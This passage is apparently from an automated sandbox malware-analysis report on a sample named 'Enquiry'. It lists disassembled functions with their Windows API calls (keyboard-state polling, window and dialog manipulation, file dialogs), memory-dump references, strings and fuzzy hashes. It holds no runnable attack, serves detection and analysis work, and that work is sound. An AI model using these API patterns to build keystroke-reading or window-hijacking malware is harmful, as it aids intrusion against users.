                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: MessageSend$CharNext
                            • String ID:
                            • API String ID: 1350042424-0
                            • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                            • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                            • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                            • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                            APIs
                              • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                              • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                            • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                            • _wcscpy.LIBCMT ref: 004787E5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                            • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                            • API String ID: 3052893215-2127371420
                            • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                            • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                            • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                            • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                            APIs
                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                            • __swprintf.LIBCMT ref: 0045E7F7
                            • _wprintf.LIBCMT ref: 0045E8B3
                            • _wprintf.LIBCMT ref: 0045E8D7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                            • API String ID: 2295938435-2354261254
                            • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                            • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                            • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                            • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: __swprintf_wcscpy$__i64tow__itow
                            • String ID: %.15g$0x%p$False$True
                            • API String ID: 3038501623-2263619337
                            • Opcode ID: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                            • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                            • Opcode Fuzzy Hash: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                            • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                            APIs
                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                            • __swprintf.LIBCMT ref: 0045E5F6
                            • _wprintf.LIBCMT ref: 0045E6A3
                            • _wprintf.LIBCMT ref: 0045E6C7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                            • API String ID: 2295938435-8599901
                            • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                            • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                            • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                            • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                            APIs
                            • timeGetTime.WINMM ref: 00443B67
                              • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                            • Sleep.KERNEL32(0000000A), ref: 00443B9F
                            • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                            • SetActiveWindow.USER32(?), ref: 00443BEC
                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                            • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                            • Sleep.KERNEL32(000000FA), ref: 00443C2D
                            • IsWindow.USER32(?), ref: 00443C3A
                            • EndDialog.USER32(?,00000000), ref: 00443C4C
                              • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                              • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                              • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                            • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                            • String ID: BUTTON
                            • API String ID: 1834419854-3405671355
                            • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                            • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                            • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                            • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                            • LoadStringW.USER32(00000000), ref: 00454040
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • _wprintf.LIBCMT ref: 00454074
                            • __swprintf.LIBCMT ref: 004540A3
                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                            • API String ID: 455036304-4153970271
                            • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                            • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                            • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                            • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                            APIs
                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                            • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                            • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                            • _memmove.LIBCMT ref: 00467EB8
                            • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                            • _memmove.LIBCMT ref: 00467F6C
                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                            • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                            • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                            • String ID:
                            • API String ID: 2170234536-0
                            • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                            • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                            • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                            • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                            APIs
                            • GetKeyboardState.USER32(?), ref: 00453CE0
                            • SetKeyboardState.USER32(?), ref: 00453D3B
                            • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                            • GetKeyState.USER32(000000A0), ref: 00453D75
                            • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                            • GetKeyState.USER32(000000A1), ref: 00453DB5
                            • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                            • GetKeyState.USER32(00000011), ref: 00453DEF
                            • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                            • GetKeyState.USER32(00000012), ref: 00453E26
                            • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                            • GetKeyState.USER32(0000005B), ref: 00453E5D
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: State$Async$Keyboard
                            • String ID:
                            • API String ID: 541375521-0
                            • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                            • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                            • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                            • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                            APIs
                            • GetDlgItem.USER32(?,00000001), ref: 004357DB
                            • GetWindowRect.USER32(00000000,?), ref: 004357ED
                            • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                            • GetDlgItem.USER32(?,00000002), ref: 0043586A
                            • GetWindowRect.USER32(00000000,?), ref: 0043587C
                            • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                            • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                            • GetWindowRect.USER32(00000000,?), ref: 004358EE
                            • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                            • GetDlgItem.USER32(?,000003EA), ref: 00435941
                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Window$ItemMoveRect$Invalidate
                            • String ID:
                            • API String ID: 3096461208-0
                            • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                            • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                            • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                            • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                            APIs
                            • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                            • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                            • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                            • DeleteObject.GDI32(?), ref: 0047151E
                            • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                            • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                            • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                            • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                            • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                            • DeleteObject.GDI32(?), ref: 004715EA
                            • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                            • String ID:
                            • API String ID: 3218148540-0
                            • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                            • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                            • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                            • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                            • String ID:
                            • API String ID: 136442275-0
                            • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                            • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                            • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                            • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                            APIs
                            • _wcsncpy.LIBCMT ref: 00467490
                            • _wcsncpy.LIBCMT ref: 004674BC
                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                            • _wcstok.LIBCMT ref: 004674FF
                              • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                            • _wcstok.LIBCMT ref: 004675B2
                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                            • _wcslen.LIBCMT ref: 00467793
                            • _wcscpy.LIBCMT ref: 00467641
                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                            • _wcslen.LIBCMT ref: 004677BD
                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                              • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                            • String ID: X
                            • API String ID: 3104067586-3081909835
                            • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                            • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                            • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                            • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                            APIs
                            • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                            • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                            • _wcslen.LIBCMT ref: 004610A3
                            • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                            • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                            • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                            • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                            • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                            • GetWindowRect.USER32(?,?), ref: 00461248
                              • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
